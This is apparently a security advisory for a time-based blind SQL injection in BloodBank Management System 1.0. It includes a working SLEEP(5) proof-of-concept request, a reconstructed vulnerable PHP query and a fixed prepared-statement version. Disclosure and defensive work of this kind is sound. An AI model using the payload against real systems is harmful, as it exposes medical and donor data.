
@higordiego
Last active October 25, 2024 13:24

Affected Version:

  • BloodBank Management System: 1.0

Vulnerability Information:

  • Vulnerability Type: SQL Injection (Time-Based Blind)
  • Severity: HIGH
  • Status: Unpatched

Vulnerable Endpoint:

  • /file/accept.php?reqid=3

Vulnerability Description:

A SQL Injection vulnerability has been identified in the BloodBank Management System version 1.0. The issue lies in the file acceptance functionality, which processes requests made by hospitals or donors. The reqid parameter is not properly sanitized before it reaches the database query, allowing attackers to manipulate the SQL statement and execute arbitrary database operations.

This vulnerability enables time-based blind SQL injection: the injected SQL forces the database to delay its response when a chosen condition holds. Although no data is returned directly, the response time reveals whether the injected condition was true, which is enough to infer database contents one condition at a time. This can allow attackers to:

  • Extract sensitive data by repeatedly querying the database and inferring one result per request from the response delay.
  • Modify or delete database records.
  • Perform Denial of Service (DoS) by executing time-consuming operations, impacting availability.

Proof of Concept (PoC):

Below is an example of a GET request that demonstrates the time-based blind SQL injection. The URL-encoded reqid value decodes to 3' AND (SELECT 6479 FROM (SELECT(SLEEP(5)))RvgZ)-- MSPb, which makes the database pause for 5 seconds before responding, proving that the parameter is concatenated into the query unsafely:

GET /file/accept.php?reqid=3'%20AND%20(SELECT%206479%20FROM%20(SELECT(SLEEP(5)))RvgZ)--%20MSPb HTTP/1.1
Host: localhost:8080
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/bloodrequest.php?msg=hospital1%20have%20logged%20in.
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive

When executed, the query causes the system to sleep for 5 seconds before returning a response, confirming that the endpoint is vulnerable to SQL injection. Attackers can use this method to extract information by varying the injected condition and observing the response times.

Impact:

  • Data Breach: Unauthorized access to sensitive medical and donor records.
  • Service Disruption: Delays caused by time-based queries could disrupt system availability and lead to Denial of Service (DoS).
  • Data Integrity Risks: Attackers could modify or delete critical information, such as blood request records or donor data.


Mitigation Recommendations:

  1. Use Prepared Statements: Ensure that all SQL queries are parameterized so that user input is always bound as data, never interpreted as SQL.
  2. Input Validation: Validate user inputs against the expected type before executing SQL queries (reqid is an identifier, so anything other than a positive integer should be rejected).
  3. Error Handling: Avoid revealing SQL errors in responses; log them server-side instead, since error output helps attackers refine their queries.
  4. Database Privilege Restrictions: Limit the privileges of the database user handling requests to minimize damage if the application is compromised.
  5. Implement Rate Limiting: Limit the number of requests from a single source to mitigate DoS risks and slow down blind extraction, which needs many requests.
  6. Regular Security Audits: Conduct penetration testing and code reviews to identify and patch vulnerabilities proactively.
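The following is an added example illustrating recommendations 1 to 3 for this endpoint; it is not the project's own code. The "before" function is an assumed reconstruction of how accept.php uses reqid (the page does not show the source), and the connection $conn, the table blood_request and its integer column reqid are assumptions.

```php
<?php
// Added example (not the BloodBank Management System's code). The vulnerable
// shape below is assumed from the advisory: reqid is concatenated into SQL.
// Assumes a mysqli connection $conn and a table `blood_request` with an
// integer primary key `reqid` (both assumed names).

// BEFORE (vulnerable, reconstructed): the raw query-string value becomes part
// of the SQL text, so the PoC value 3' AND (SELECT ... SLEEP(5)) ... -- is run
// by the database as SQL and the response is delayed by 5 seconds.
function acceptRequestVulnerable(mysqli $conn, array $get): void
{
    $reqid = $get['reqid'];
    $sql = "UPDATE blood_request SET status = 'accepted' WHERE reqid = '" . $reqid . "'";
    $conn->query($sql);
}

// AFTER: validate the type first, then bind the value as a parameter so it
// can never be interpreted as SQL. Returns false on bad input or a database
// failure instead of echoing the error to the client (recommendation 3).
function acceptRequestSafe(mysqli $conn, array $get): bool
{
    // reqid is an identifier: accept only a positive integer, reject anything else
    // (the PoC payload fails this check before any SQL is built).
    $reqid = filter_var($get['reqid'] ?? '', FILTER_VALIDATE_INT,
                        ['options' => ['min_range' => 1]]);
    if ($reqid === false) {
        http_response_code(400);
        return false;
    }

    // Placeholder `?` is bound below; the database receives the value as an integer.
    $stmt = $conn->prepare("UPDATE blood_request SET status = 'accepted' WHERE reqid = ?");
    if ($stmt === false) {
        error_log('accept.php: prepare failed: ' . $conn->error); // log, do not display
        http_response_code(500);
        return false;
    }
    $stmt->bind_param('i', $reqid); // 'i' = integer parameter
    $ok = $stmt->execute();
    if (!$ok) {
        error_log('accept.php: execute failed: ' . $stmt->error);
    }
    $stmt->close();
    return $ok;
}
```

With the safe version, the advisory's PoC request receives an HTTP 400 immediately, so a 5-second delay can no longer be used as a signal.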